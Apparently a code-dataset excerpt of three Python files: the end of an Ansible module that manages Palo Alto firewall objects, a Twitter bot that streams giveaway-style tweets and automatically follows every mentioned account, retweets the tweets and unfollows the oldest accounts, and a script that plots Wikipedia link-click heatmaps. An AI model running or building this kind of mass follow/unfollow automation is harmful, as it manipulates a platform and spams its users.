# Firewall: set the targetted vsys.
device.vsys = vsys
# What type of object are we talking about?
if addressobject:
obj_name = addressobject
obj_type = objects.AddressObject
elif addressgroup:
obj_name = addressgroup
obj_type = objects.AddressGroup
elif serviceobject:
obj_name = serviceobject
obj_type = objects.ServiceObject
elif servicegroup:
obj_name = servicegroup
obj_type = objects.ServiceGroup
elif tag_name:
obj_name = tag_name
obj_type = objects.Tag
else:
module.fail_json(msg='No object type defined!')
# Which operation shall we perform on the object?
msg = None
if operation == "find":
# Search for the object
match = find_object(device, dev_group, obj_name, obj_type)
# If found, format and return the result
if match:
match_dict = xmltodict.parse(match.element_str())
module.exit_json(
stdout_lines=json.dumps(match_dict, indent=2),
msg='Object matched'
)
else:
module.fail_json(msg='Object \'%s\' not found. Is the name correct?' % obj_name)
elif operation == "delete":
# Search for the object
match = find_object(device, dev_group, obj_name, obj_type)
# If found, delete it
if match:
try:
match.delete()
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
msg = "Object '{0}' successfully deleted".format(obj_name)
else:
module.fail_json(msg='Object \'%s\' not found. Is the name correct?' % obj_name)
elif operation == "add":
# Search for the object. Fail if found.
match = find_object(device, dev_group, obj_name, obj_type)
if match:
module.fail_json(msg='Object \'%s\' already exists. Use operation: \'update\' to change it.' % obj_name)
else:
try:
new_object = create_object(
addressobject=addressobject,
addressgroup=addressgroup,
serviceobject=serviceobject,
servicegroup=servicegroup,
address=address,
address_type=address_type,
static_value=static_value,
dynamic_value=dynamic_value,
protocol=protocol,
source_port=source_port,
destination_port=destination_port,
services=services,
description=description,
tag_name=tag_name,
color=color
)
changed = add_object(device, dev_group, new_object)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
msg = "Object '{0}' successfully added".format(obj_name)
elif operation == "update":
# Search for the object. Update if found.
match = find_object(device, dev_group, obj_name, obj_type)
if match:
try:
new_object = create_object(
addressobject=addressobject,
addressgroup=addressgroup,
serviceobject=serviceobject,
servicegroup=servicegroup,
address=address,
address_type=address_type,
static_value=static_value,
dynamic_value=dynamic_value,
protocol=protocol,
source_port=source_port,
destination_port=destination_port,
services=services,
description=description,
tag_name=tag_name,
color=color
)
changed = add_object(device, dev_group, new_object)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
msg = "Object '{0}' successfully updated.".format(obj_name)
else:
module.fail_json(msg='Object \'%s\' does not exist. Use operation: \'add\' to add it.' % obj_name)
# Optional: commit the change.
if commit:
try:
device.commit(sync=True)
except PanDeviceError as e:
module.fail_json(msg='Failed to commit: {0}'.format(e))
# Done.
module.exit_json(changed=True, msg=msg)
if __name__ == '__main__':
main()
| isc | 49,532,090,653,482,990 | 34.418511 | 118 | 0.589104 | false |
svenrdz/bot_twitter | autofollowrt/autofollowrt.py | 1 | 21724 | # -*- coding: utf-8 -*-
# native imports
import os
import re
import sys
import copy
import time
import pickle
import random
from threading import Thread, RLock
from multiprocessing import Queue
# external imports
# Twitter package: https://pypi.python.org/pypi/twitter
# Homepage of Twitter package: http://mike.verdone.ca/twitter/
try:
import twitter
IMPTWITTER = True
except:
print(u"WARNING from AutoFollowRT: Could not load the 'twitter' library, so Twitter functionality is not available.")
IMPTWITTER = False
reload(sys)
sys.setdefaultencoding('utf-8')
class AutoFollowRT():
"""
Class for managing a twitter account.
"""
def __init__(self):
"""
Initialises the bot.
"""
# # # # #
# DATA
self._to_follow = []
self._to_rt = []
self._following = []
self._to_follow_count = 0
self._to_rt_count = 0
self._following_count = 0
# # # # #
# TWITTER
# Starting value for the Twitter and TwitterStream instances
self._t = None
self._ts = None
# Create locks for these instances, so they won't be accessed at the
# same time by different threads.
self._tlock = RLock()
self._tslock = RLock()
# Rate limiting variables
self._requests_max = 15
self._requests_count = 0
self._unfollow_requests = 0
# Start the threads
self._track_enable = False
self._follow_rt_enable = False
if IMPTWITTER:
self._trackthreadlives = True
self._trackthread = Thread(target=self._tracking)
self._trackthread.daemon = True
self._trackthread.name = u'word_tracker'
self._trackthread.start()
self._followrtthreadlives = True
self._followrtthread = Thread(target=self._follow_rt)
self._followrtthread.daemon = True
self._followrtthread.name = u'follow_rt'
self._followrtthread.start()
else:
self._trackthreadlives = False
self._followrtthreadlives = False
# Create a Boolean that indicates whether the bot is logged in, and
# a placeholder for the credentials of the user that is logged in
self._loggedin = False
# Parameters
self._config = {u'lang': 'fr',
u'min_delay': 0,
u'max_delay': 0,
u'avoid_users': [],
u'avoid_words': [],
u'reload_every_min': 60,
u'max_follow': 1000,
u'unfollow_threshold': 200}
def setup(self):
"""
Reads the config.txt file that has to be filled with desired parameters
"""
# Prepares the bot on first use (or if txt files have been deleted)
self._first_launch()
# Load config.txt file
file = "config.txt"
with open(file, "r") as config:
for line in config:
if line.startswith('#') or line.endswith('****'):
continue
line = line.split(' = ')
if len(line) < 2:
continue
parameter = line[0].decode('utf-8').strip()
value = line[1].decode('utf-8').strip()
if parameter == u'words':
value = ','.join([word.strip()
for word in value.split(',')])
elif parameter in [u'follow_words',
u'rt_words',
u'avoid_words',
u'avoid_users']:
value = [word.strip() for word in value.split(',')]
elif parameter in [u'min_delay',
u'max_delay',
u'reload_every_min',
u'max_follow',
u'unfollow_threshold']:
value = int(value)
self._config[parameter] = value
missing_params = []
required_params = [u'user',
u'cons_key',
u'cons_secret',
u'access_token',
u'access_token_secret',
u'words',
u'follow_words',
u'rt_words']
for param in required_params:
if param not in self._config:
missing_params.append(param)
if len(missing_params) > 0:
self._error(u'setup',
u"Please add {} to config.txt file.".format(", ".join(param for param in missing_params).encode('utf-8')))
# Load to_follow.txt file
file = "to_follow.txt"
with open(file, 'r') as f:
for line in f:
self._to_follow.append(line.decode('utf-8').strip())
self._to_follow_count = len(self._to_follow)
# Load to_retweet.txt file
file = "to_retweet.txt"
with open(file, 'r') as f:
for line in f:
self._to_rt.append(line.decode('utf-8').strip())
self._to_rt_count = len(self._to_rt)
# Load following.txt file
file = "following.txt"
with open(file, 'r') as f:
for line in f:
self._following.append(line.decode('utf-8').strip())
self._following_count = len(self._following)
self._message(u'setup',
u"Done.")
def login(self):
"""
Logs in to Twitter, using the provided access keys. You can get
these for your own Twitter account at apps.twitter.com
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'login',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._oauth = twitter.OAuth(self._config[u'access_token'],
self._config[u'access_token_secret'],
self._config[u'cons_key'],
self._config[u'cons_secret'])
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
try:
self._t.search.tweets(q='bonjour', count=1)
except twitter.TwitterHTTPError:
self._error(u'login',
u"Could not login. Please verify OAuth keys in config.txt")
self._loggedin = True
self._message(u'login',
u"Done.")
def start_tracking(self):
"""
Starts the thread for tracking
"""
# Start thread
self._track_enable = True
self._message(u'start_tracking',
u"Tracking Stream for {} initialized.".format(self._config[u'words']).encode('utf-8'))
def start_follow_rt(self):
"""
Starts the thread for following/retweeting
"""
self._requests_count = 0
self._set_number_unfollow_per_block()
# Start thread
time.sleep(5)
self._follow_rt_enable = True
self._message(u'start_follow_rt',
u"New 15-minute block for following/retweeting")
def stop_tracking(self):
"""
Stops the thread for tracking
"""
# Stop thread
self._track_enable = False
def stop_follow_rt(self):
"""
Stops the thread for following/retweeting
"""
# Stop thread
self._follow_rt_enable = False
def _tracking(self):
"""
Thread : select candidate tweets
"""
while self._trackthreadlives:
time.sleep(1)
while self._loggedin and self._track_enable:
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_tracking',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Open stream and track the chosen words
with self._tslock:
search = self._ts.statuses.filter(track=self._config[u'words'],
language=self._config[u'lang'])
for tweet in search:
# Reconnect whenever a hangup shows up from twitter API
if 'hangup' in tweet.keys():
self._reconnect()
continue
# to avoid failing
if u'text' not in tweet.keys():
continue
# Get info on current tweet
text = tweet[u'text'].decode('utf-8').lower()
tokens = re.sub("[^\w]", " ", text).split()
username = tweet[u'user'][u'screen_name'].decode('utf-8')
# Routine checks :
# Avoid some users
if username in self._config[u'avoid_users']:
continue
# Avoid some words
if any(x in tokens for x in self._config[u'avoid_words']):
continue
# Tweet does not start with 'RT @'
if text.startswith('rt @') or tweet['retweeted']:
continue
# Tweet contains at least one follow_word and one rt_word
if any(x in tokens for x in self._config[u'rt_words']) and any(x in tokens for x in self._config[u'follow_words']):
self._process_tweet(tweet)
def _process_tweet(self, tweet):
"""
Processes the tweet found by tracking function
"""
# Read the tweet
text = tweet[u'text'].decode('utf-8')
tweet_id = tweet[u'id']
username = tweet[u'user'][u'screen_name'].decode('utf-8')
to_follow = [username]
# Find accounts to be followed (assume every @user has to be)
for word in text.split():
if word[0] == '@' and word[1:] != username:
to_follow.append(word[1:])
# Follow and retweet
self._follow_later(to_follow)
self._retweet_later(tweet_id)
self._message(u'_process_tweet',
u"{} : {}\n{}\n".format(username, tweet_id, text).encode('utf-8'))
def _follow_later(self, to_follow):
"""
Saves the ids of the people to follow later in a txt file.
"""
user_ids = self._get_user_id(to_follow)
new_users = []
for user in set(user_ids) - set(self._to_follow):
self._to_follow.append(user)
new_users.append(user)
self._to_follow_count = len(self._to_follow)
file = "to_follow.txt"
with open(file, 'a') as f:
for user in new_users:
f.write("{}\n".format(user).encode('utf-8'))
def _retweet_later(self, to_retweet):
"""
Saves the ids of the tweets to retweet later in a txt file.
"""
self._to_rt.append(to_retweet)
self._to_rt_count = len(self._to_rt)
file = "to_retweet.txt"
with open(file, 'a') as f:
f.write("{}\n".format(to_retweet).encode('utf-8'))
def _follow_rt(self):
"""
Thread : manage follows and retweets
"""
while self._followrtthreadlives:
time.sleep(1)
while self._loggedin and self._follow_rt_enable and self._requests_count < self._requests_max:
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_follow_rt',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
try:
ratio_follow_per_rt = int(
round(self._to_follow_count / float(self._to_rt_count)))
except ZeroDivisionError:
ratio_follow_per_rt = 2
if ratio_follow_per_rt < 2:
ratio_follow_per_rt = 2
time.sleep(self._wait())
if self._following_count >= self._config['max_follow']:
self._unfollow_oldest()
else:
if self._to_follow_count > 0 and self._to_rt_count > 0:
if self._requests_count % ratio_follow_per_rt == 0:
self._rt_next_tweet()
else:
self._follow_next_user()
elif self._to_follow_count > 0 and self._to_rt_count == 0:
self._follow_next_user()
elif self._to_rt_count > 0 and self._to_follow_count == 0:
self._rt_next_tweet()
elif self._to_follow_count == 0 and self._to_rt_count == 0:
if self._unfollow_requests > 0:
self._unfollow_oldest()
self._unfollow_requests -= 1
def _follow_next_user(self):
"""
Follows the first user in to_follow.txt and erase it from the file
if it is a success.
"""
user_to_follow = self._to_follow[0]
followed = False
if user_to_follow not in self._following:
with self._tlock:
try:
self._t.friendships.create(user_id=user_to_follow)
followed = True
except:
self._message(u'_follow_next_user',
u"Could not follow user {}".format(user_to_follow).encode('utf-8'))
self._following.append(user_to_follow)
self._following_count = len(self._following)
self._requests_count += 1
else:
idx = self._following.index(user_to_follow)
self._following.append(self._following.pop(idx))
self._to_follow.pop(0)
self._to_follow_count = len(self._to_follow)
file = "to_follow.txt"
with open(file, 'w') as f:
for user in self._to_follow:
f.write("{}\n".format(user).encode('utf-8'))
file = "following.txt"
with open(file, 'w') as f:
for user in self._following:
f.write("{}\n".format(user).encode('utf-8'))
if followed:
self._message(u'_follow_next_user',
u"User {} was succesfully followed".format(user_to_follow).encode('utf-8'))
def _rt_next_tweet(self):
"""
Retweets the first tweet in to_retweet.txt and erase it from the
file if it is a success.
"""
tweet_to_rt = self._to_rt[0]
with self._tlock:
try:
self._t.statuses.retweet(id=tweet_to_rt)
retweeted = True
except:
retweeted = False
self._to_rt.pop(0)
# Update class variables
self._requests_count += 1
self._to_rt_count = len(self._to_rt)
if retweeted:
file = "to_retweet.txt"
with open(file, 'w') as f:
for tweet in self._to_rt:
f.write("{}\n".format(tweet).encode('utf-8'))
self._message(u'_rt_next_tweet',
u"Tweet {} was succesfully retweeted".format(tweet_to_rt).encode('utf-8'))
else:
self._message(u'_rt_next_tweet',
u"Could not retweet {}".format(tweet_to_rt).encode('utf-8'))
def _unfollow_oldest(self):
"""
Unfollows the oldest followed user in the list
"""
user_to_follow = self._following[0]
with self._tlock:
try:
self._t.friendships.destroy(user_id=user_to_follow)
except:
self._message(u'_unfollow_oldest',
u"Could not unfollow user {}".format(user_to_follow).encode('utf-8'))
self._following.pop(0)
self._following_count = len(self._following)
self._requests_count += 1
file = "following.txt"
with open(file, 'w') as f:
for user in self._following:
f.write("{}\n".format(user).encode('utf-8'))
self._message(u'_unfollow_oldest',
u"User {} was succesfully unfollowed".format(user_to_follow).encode('utf-8'))
def _get_user_id(self, screen_names):
"""
Returns user id from user(s) with the screen_name(s) in input.
"""
screen_names_str = ','.join(screen_names).encode('utf-8')
with self._tlock:
users = self._t.users.lookup(screen_name=screen_names_str)
user_ids = [users[i][u'id'] for i in range(len(users))]
return user_ids
def _save_following(self):
"""
Reloads the list of users you are following and save them to the bot's
own variables and following.txt
"""
file = "following.txt"
with open(file, 'w') as f:
for user in self._following:
f.write("{}\n".format(user).encode('utf-8'))
self._message(u'start_follow_rt',
u"Following list updated")
def _set_number_unfollow_per_block(self):
"""
Chooses a number of unfollow actions depending on parameters and
number of accounts currently following
"""
difference = (self._config['max_follow'] - self._config['unfollow_threshold']) / 3
th1 = self._config['unfollow_threshold']
th2 = self._config['unfollow_threshold'] + difference
th3 = self._config['unfollow_threshold'] + difference * 2
if self._following_count > th3:
self._unfollow_requests = 3
if self._following_count > th2:
self._unfollow_requests = 2
if self._following_count > th1:
self._unfollow_requests = 1
else:
self._unfollow_requests = 0
def _error(self, methodname, msg):
"""
Raises an Exception on behalf of the method involved.
Arguments
methodname - String indicating the name of the method that is
throwing the error.
message - String with the error message.
"""
raise Exception(
u"ERROR in AutoFollowRT.{}: {}".format(methodname, msg).encode('utf-8'))
def _message(self, methodname, msg):
"""
Prints a message on behalf of the method involved. Friendly
verion of self._error
Arguments
methodname - String indicating the name of the method that is
throwing the error.
message - String with the error message.
"""
print(u"AutoFollowRT.{}: {}".format(methodname, msg).encode('utf-8'))
print("-" * 12)
sys.stdout.flush()
def _reconnect(self):
"""
Logs in to Twitter, using the stored OAuth. This function is
intended for internal use, and should ONLY be called after
login has been called.
"""
# Report the reconnection attempt.
self._message(u'_reconnect',
u"Attempting to reconnect to Twitter.")
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_reconnect',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
try:
self._t.search.tweets(q='bonjour', count=1)
except twitter.TwitterHTTPError:
self._error(u'_reconnect',
u"Could not login. Please verify OAuth keys in config.txt")
self._loggedin = True
# Report the reconnection success.
self._message(u'_reconnect',
u"Successfully reconnected to Twitter!")
def _wait(self):
"""
Wait a random time given by a user fork before taking actions
"""
tmin, tmax = self._config[u'min_delay'], self._config[u'max_delay']
if tmin > tmax:
tmin, tmax = tmax, tmin
delay = random.randint(tmin, tmax)
return delay
def _first_launch(self):
"""
Creates the txt files that prepare the bot to work with the account
"""
file = "to_follow.txt"
if not os.path.isfile(file):
with open(file, 'w') as f:
pass
self._message(u'_first_launch',
u"{} was created".format(file).encode('utf-8'))
file = "to_retweet.txt"
if not os.path.isfile(file):
with open(file, 'w') as f:
pass
self._message(u'_first_launch',
u"{} was created".format(file).encode('utf-8'))
file = "following.txt"
if not os.path.isfile(file):
with open(file, 'w') as f:
pass
self._message(u'_first_launch',
u"{} was created".format(file).encode('utf-8'))
| gpl-3.0 | -6,055,042,456,488,697,000 | 33.537361 | 135 | 0.506997 | false |
linksuccess/linksuccess | parsingframework/heatmaps.py | 1 | 18035 | import numpy as np
import numpy.random
import matplotlib.pyplot as plt
import cPickle as pickle
import MySQLdb
from wsd.database import MySQLDatabase
import matplotlib.cm as cm
from matplotlib.colors import LogNorm, Normalize, BoundaryNorm, PowerNorm
from conf import *
from matplotlib import style
style.use('acm-3col')
import pylab
params = {
'font.family' : 'serif',
'font.serif' : ['Times New Roman'],
'font.size' : 7
}
pylab.rcParams.update(params)
def clicks_heatmap():
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords_clicks()
print 'coord loaded'
links = {}
x = []
y = []
values = []
confident_values = []
not_confident_values = []
x_conf = []
y_conf = []
x_not_conf = []
y_not_conf = []
number_of_not_confident_clicks=0
number_of_confident_clicks = 0
number_of_valid_normed_links=0
for coord in coords:
try:
v = links[coord['key']]
links[coord['key']]+=1
except:
links[coord['key']]=0
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(coord['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
number_of_valid_normed_links+=1
if links[coord['key']]==0:
x_conf.append(x_normed)
y_conf.append(y_normed)
values.append(float(coord['counts']))
number_of_confident_clicks+=1
confident_values.append(coord['counts'])
else:
x_not_conf.append(x_normed)
y_not_conf.append(y_normed)
values.append(float(coord['counts'])/float(links[coord['key']])+1.0)
number_of_not_confident_clicks+=1
not_confident_values.append(float(coord['counts'])/float(links[coord['key']]))
print '###########'
print sum(values)
print sum(confident_values)
print number_of_confident_clicks
print sum(not_confident_values)
print number_of_not_confident_clicks
print number_of_valid_normed_links
print len(coords)
print '###########'
heatmap, xedges, yedges = np.histogram2d(x_conf, y_conf, bins=100, weights=confident_values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_confident.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_confident.pdf')
print "conf done"
heatmap, xedges, yedges = np.histogram2d(x_not_conf, y_not_conf, bins=100, weights=not_confident_values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_not_confident.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_not_confident.pdf')
print " not conf done"
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100, weights=values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_1.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_1.pdf')
print "done"
def clicks_heatmap_first_occ():
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords_clicks_first_occ()
print 'coord loaded'
links = {}
x = []
y = []
values = []
for link in coords.values():
x_normed = float(link['x'])/float(1920)
y_normed = float(link['y'])/float(link['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
values.append(float(link['counts']))
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100, weights=values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_first_occ.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_first_occ.pdf')
print "done"
def clicks_heatmap_total():
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords_clicks()
print 'coord loaded'
links = {}
x = []
y = []
values = []
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(coord['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
values.append(float(coord['counts']))
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100, weights=values)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0] ]
fig_size = (2.4, 2)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Log Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_lognormed_self_loop_total.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Clicks Heatmap Normalized")
plt.show()
plt.savefig('output/clicks_heatmap_normed_self_loop_total.pdf')
print "done"
def links_heatmap():
#http://stackoverflow.com/questions/2369492/generate-a-heatmap-in-matplotlib-using-a-scatter-data-set
# Get URLs from a text file, remove white space.
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords()
print 'coord loaded'
x=[]
y=[]
page_lenghts = db_worker_view.retrieve_all_page_lengths()
print 'lenghts loaded'
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(page_lenghts[coord['source_article_id']])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
heatmap, xedges, yedges = np.histogram2d(x, y, bins=100)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Log Normalized")
plt.show()
plt.savefig('output/links_heatmap_lognormed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_heatmap_normed_self_loop.pdf')
print "done"
def multiple_links_heatmap():
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_multpile_occ()
print 'coord loaded'
page_lenghts = db_worker_view.retrieve_all_page_lengths()
print 'lenghts loaded'
links = {}
x = []
y = []
x_conf = []
y_conf = []
x_not_conf = []
y_not_conf = []
number_of_not_confident_clicks=0
number_of_confident_clicks = 0
number_of_valid_normed_links=0
for coord in coords:
try:
v = links[coord['key']]
links[coord['key']]+=1
except:
links[coord['key']]=0
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(page_lenghts[coord['key'][0]])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
number_of_valid_normed_links+=1
if links[coord['key']]==0:
x_conf.append(x_normed)
y_conf.append(y_normed)
number_of_confident_clicks+=1
else:
x_not_conf.append(x_normed)
y_not_conf.append(y_normed)
number_of_not_confident_clicks+=1
print '###########'
print number_of_confident_clicks
print number_of_not_confident_clicks
print number_of_valid_normed_links
print len(coords)
print '###########'
heatmap, xedges, yedges = np.histogram2d(x_conf, y_conf, bins=100)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Log Normalized")
plt.show()
plt.savefig('output/links_heatmap_lognormed_self_loop_unique.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_heatmap_normed_self_loop_unique.pdf')
print "unique done"
heatmap, xedges, yedges = np.histogram2d(x_not_conf, y_not_conf, bins=100)
extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
fig_size = (2.4, 2)
#fig_size = (3.5, 3)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap, extent=extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Log Normalized")
plt.show()
plt.savefig('output/links_heatmap_lognormed_self_loop_multiple.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(heatmap , extent=extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
#plt.title("Links Heatmap Normalized")
plt.show()
plt.savefig('output/links_heatmap_normed_self_loop_multiple.pdf')
print "done"
def links_heatmap_rel_prob():
#http://stackoverflow.com/questions/2369492/generate-a-heatmap-in-matplotlib-using-a-scatter-data-set
# Get URLs from a text file, remove white space.
print 'loading'
db = MySQLDatabase(DATABASE_HOST, DATABASE_USER, DATABASE_PASSWORD, DATABASE_NAME)
db_worker_view = db.get_work_view()
coords = db_worker_view.retrieve_all_links_coords()
x=[]
y=[]
page_lenghts = db_worker_view.retrieve_all_page_lengths()
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(page_lenghts[coord['source_article_id']])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
links_heatmap_hist, xedges, yedges = np.histogram2d(x, y, normed=True, bins=100)
links_extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
coords = db_worker_view.retrieve_all_links_coords_clicks()
print 'coord loaded'
links = {}
x = []
y = []
values = []
for coord in coords:
try:
v = links[coord['key']]
links[coord['key']]+=1
except:
links[coord['key']]=0
for coord in coords:
x_normed = float(coord['x'])/float(1920)
y_normed = float(coord['y'])/float(coord['page_length'])
if x_normed <=1.0 and y_normed <=1.0:
x.append(x_normed)
y.append(y_normed)
if links[coord['key']]==0:
#x.append(x_normed)
#y.append(y_normed)
values.append(float(coord['counts']))
else:
values.append(float(coord['counts'])/float(links[coord['key']]))
clicks_heatmap_hist, xedges, yedges = np.histogram2d(x, y, bins=100, normed=True, weights=values)
clicks_extent = [xedges[0], xedges[-1], yedges[-1], yedges[0]]
substraction_hist = np.subtract(clicks_heatmap_hist,links_heatmap_hist)
#rel_prob_hist = np.divide(clicks_heatmap_hist, links_heatmap_hist)
with np.errstate(divide='ignore', invalid='ignore'):
rel_prob_hist = np.divide(clicks_heatmap_hist, links_heatmap_hist)
rel_prob_hist[rel_prob_hist == np.inf] = 0
rel_prob_hist = np.nan_to_num(rel_prob_hist)
fig_size = (2.4, 2)
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper',norm=Normalize(), cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
plt.savefig('output/clicks-links_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(rel_prob_hist , extent=clicks_extent, origin='upper', norm=Normalize(),cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
plt.savefig('output/clicks_over_links_heatmap_normed_self_loop.pdf')
plt.clf()
plt.figure(figsize=fig_size)
plt.grid(True)
plt.imshow(substraction_hist, extent=clicks_extent, origin='upper', norm=LogNorm(), cmap=plt.get_cmap('jet'))
plt.colorbar()
plt.show()
